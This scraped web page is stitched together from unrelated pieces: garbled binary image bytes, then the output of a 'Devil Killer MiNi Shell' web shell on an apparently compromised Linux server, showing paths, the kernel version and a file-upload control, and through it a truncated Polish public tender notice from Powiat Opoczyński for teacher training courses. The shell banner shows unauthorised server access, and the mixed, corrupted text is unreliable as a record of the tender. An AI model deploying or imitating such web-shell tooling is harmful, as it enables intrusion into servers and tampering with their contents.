JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230125/0005754901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie szkoleń/kursów dla słuchaczy i nauczycieli ze szkół z terenu powiatu opoczyńskiego w ramach projektów współfinansowanych ze środków UE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczyńskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648439</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kwiatowa 1a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opoczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 741 49 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">44 741 49 01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia_publiczne@opocznopowiat.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.opocznopowiat.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie szkoleń/kursów dla słuchaczy i nauczycieli ze szkół z terenu powiatu opoczyńskiego w ramach projektów współfinansowanych ze środków UE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-da8e04cc-9bf0-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00057549</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00025499/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przeprowadzenie szkoleń/kursów dla słuchaczy i nauczycieli ze szkół z terenu powiatu opoczyńskiego w ramach projektów współfinansowanych ze środków UE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „WSPIERAMY PRZYSZŁOŚĆ ZAWODOWĄ – PODNIESIENIE JAKOŚCI SZKOLNICTWA ZAWODOWEGO W POWIATOWYM CENTRUM KSZTAŁCENIA ZAWODOWEGO I USTAWICZNEGO W MROCZKOWIE GOŚCINNYM” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-da8e04cc-9bf0-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W niniejszym postępowaniu o udzielenie zamówienia komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w : <br/>-Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452)<br/>-Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (DZ.U. 2020 poz. 2415).<br/>2. W niniejszym postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która dostępna jest pod adresem https://ezamowienia.gov.pl<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania do Platformy e-Zamówienia.<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>5.1. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia, w szczególności SWZ wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>5.2. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>5.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>5.4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa § 12 Regulamin Platformy e-Zamówienia.<br/>6. Zamawiający w uzasadnionych przypadkach dopuszcza także komunikację za pomocą poczty elektronicznej (zamowienia_publiczne@opocznopowiat.pl) z wykorzystaniem nr sprawy: IiZP.272.5.2023, w szczególności przekazywania wezwań i zawiadomień, zadawania pytań, wyjaśnień treści oferty i wyjaśnień dotyczących badania rażąco niskiej ceny. <br/>7. Informacje o sposobie komunikowania się Zamawiającego z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 ustawy Pzp<br/>7.1. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.<br/><br/>Ze względu na ograniczoną liczbę znaków pozostałe informacje, które nie znalazły się w ogłoszeniu o zamówieniu znajdują się w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. administratorem Pani/Pana danych osobowych jest Powiat Opoczyński reprezentowanym przez Starostę Opoczyńskiego członka Zarządu Powiatu Opoczyńskiego z siedzibą w Opocznie przy ul. Kwiatowej 1a;<br/>2. dane kontaktowe inspektora ochrony danych osobowych, iod@opocznopowiat.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego dla zadania: Przeprowadzenie szkoleń/kursów dla słuchaczy i nauczycieli ze szkół z terenu powiatu opoczyńskiego w ramach projektów współfinansowanych ze środków UE /Nr sprawy IiZP.272.5.2023/ prowadzonym w trybie podstawowym bez negocjacji , o którym mowa w art. 275 pkt. 1 Pzp.<br/>3. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z 11 września 2019r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 ze zm.) dalej „ustawa Pzp”<br/>4. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7. posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>___________________<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowski</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IiZP.272.5.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I <br/>Szkolenie w zakresie metodyki BIM oraz koordynacji pracy zespołowej<br/><br/>Zakres szkolenia<br/>Tematyka zawierać będzie m. in.: proces i metodyka działania BIM, narzędzia związane z metodyką BIM, formaty wymiany danych, normy ISO, dokumenty związane z metodyka BIM w przebiegu procesu, tworzenie modeli BIM w oparciu o standardy i dobre praktyki, integracja danych z wielu źródeł <br/>w środowisku do celów modelowania, koordynacja procesu tworzenia dokumentacji z modeli BIM (rysunki, zestawienia, kosztorysy, harmonogramy), wykrywanie oraz grupowanie kolizji, sprawdzanie poprawności modeli w zakresie logiki ich tworzenia oraz zapisów BEP, sprawdzanie kompletności zawartości informacyjnej modeli, przygotowanie modeli do upublicznienia (data drops, narady koordynacyjne, etc.), organizacja pracy zespołowej – podział zadań, wsparcie merytoryczne, etc., kontrola oraz raportowanie efektów pracy zespołu BIM, przygotowanie koordynacji wielobranżowej moderowanie oraz facylitacja narad koordynacyjnych.<br/><br/>Efekty:<br/>Osoby uczestniczące w szkoleniu mają możliwość przystąpienia do certyfikacji swoich kompetencji <br/>w Europejskim Centrum Certyfikacji (ECC) BIM<br/><br/>Kompetencje jakie uzyska uczestnik<br/>Nauczyciel po ukończeniu wsparcia uzyska następujące kompetencje: pozna zasady tworzenia modeli w oparciu o standardy norm ISO, pozna standardy pracy zespołowej w opracowywaniu modeli oraz koordynacji międzybranżowej; uczestnik pozna i ugruntuje wiedzę na temat BIMu jako procesu i metodyki działania.<br/><br/>Warunki szczegółowe<br/>1.	Liczba osób objętych szkoleniem 2 osoby (2 nauczycieli)<br/>2.	Czas trwania szkolenia: 32 godziny (4 dni, weekendowe tj. sobota, niedziela). <br/>3.	Uczestnikami/uczestniczkami szkolenia będą nauczyciele realizujący kształcenie zawodowe <br/>z przedmiotów budowlanych zatrudnieni w Powiatowym Centrum Kształcenia Zawodowego <br/>i Ustawicznego w Mroczkowie Gościnnym.<br/>4.	Wykonawca zapewni wykładowcę posiadającego uprawnienia do prowadzenia przedmiotowego szkolenia.<br/>5.	Realizacja szkolenia zgodnie z zakresem szkolenia. <br/>Nabyte umiejętności zostaną dokładnie określone w zaświadczeniu opracowanym przez Wykonawcę.<br/>6.	Termin szkolenia podany przez Wykonawcę wymaga wcześniejszej akceptacji Dyrektora Powiatowego Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym. <br/>7.	Właściwe udokumentowanie szkolenia na potrzeby realizacji projektu:<br/>- przekazanie szczegółowego programu szkolenia;<br/>- weryfikacja nabytych umiejętności określonych w przedmiocie zamówienia;<br/>- potwierdzenie nabycia umiejętności określonych w przedmiocie zamówienia;<br/>- Wykonawca zobowiązany będzie do prowadzenia listy obecności, dziennika zajęć oraz przekazania ich Zamawiającemu po zakończonym szkoleniu. <br/>8.	Po zakończeniu szkolenia uczestnicy otrzymają zaświadczenia opisujące zestaw nabytych kompetencji oraz liczbę godzin zrealizowanych zajęć określonych w pkt. 2.<br/>9.	Przedmiot zamówienia zawiera wydatki związane z pełną organizacją szkolenia itp. wynagrodzenie wykładowcy, zaświadczenia potwierdzające ukończenie szkolenia wraz z opisem uzyskanych umiejętności, obsługę administracyjną, materiały szkoleniowe, itp.<br/>10.	Termin wykonania: 4 miesiące od dnia podpisania umowy, nie później niż do 16.06.2023r<br/>11.	Miejsce przeprowadzenia szkolenia: na terenie powiatu opoczyńskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis stosowanych kryteriów oraz sposób ich obliczenia.<br/>1.1. kryteria przyjęte do oceny ofert:<br/>a) „cena” C - 60% - maksymalna liczba pkt. do otrzymania 60 wg poniższego wzoru.<br/><br/> najniższa cena brutto spośród badanych ofert <br/>„C” : -----------------------------------------------------------x 60 % x 100 = liczba punktów<br/> cenę brutto badanej oferty <br/><br/>- obliczenia będą dokonywane do dwóch miejsc po przecinku<br/><br/>b) „doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń” D - 40% – maksymalna liczba pkt. do otrzymania 40, które zostaną przyznane, na podstawie złożonego przez Wykonawcę oświadczenia zawartego w formularzu ofertowym, który stanowi załącznik nr 1 do SWZ. <br/>Przyznana zostanie następująca ilość punktów za w/w kryterium:<br/>- doświadczenie - powyżej 5 lat - 40 pkt<br/>- doświadczenie - powyżej 3 lat do 5 lat - 30 pkt.<br/>- doświadczenie - powyżej 1 roku do 3 lat - 10 pkt.<br/>- doświadczenie - do 1 roku – 0 pkt.<br/>Uwaga!<br/>Brak zaznaczenia lub zaznaczenie więcej niż jednej pozycji w formularzu ofertowym będzie skutkowało odrzuceniem oferty.<br/>1.2. Łączna ocena oferty:<br/>P = C + G<br/>P – łączna liczba punktów<br/>C – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>D – ilość punktów przyznanych Wykonawcy dla kryterium „Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń”<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oceny dokonywać będą członkowie Komisji przetargowej, stosując zasadę, iż oferta nieodrzucona zawierająca łącznie najwyższą ilość punktów w w/w kryteriach jest ofertą najkorzystniejszą. Zamawiający przyjmie do porównania ofert ceny z uwzględnieniem podatku VAT, jaki będzie musiał zapłacić za wykonanie zamówienia (tj. wartości brutto złożonych ofert).<br/>4. Wyboru najkorzystniejszej oferty dokona Starosta Opoczyński, zatwierdzając propozycję Komisji przetargowej.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II<br/>Kurs diagnosty samochodowego<br/><br/>Zakres kursu<br/>Tematyka zawierać będzie m. in.: <br/>- Szkolenie Podstawowe: w zakresie przeprowadzania okresowych badań technicznych pojazdów w zakresie sprawdzenia oraz oceny prawidłowości działania poszczególnych zespołów i układów 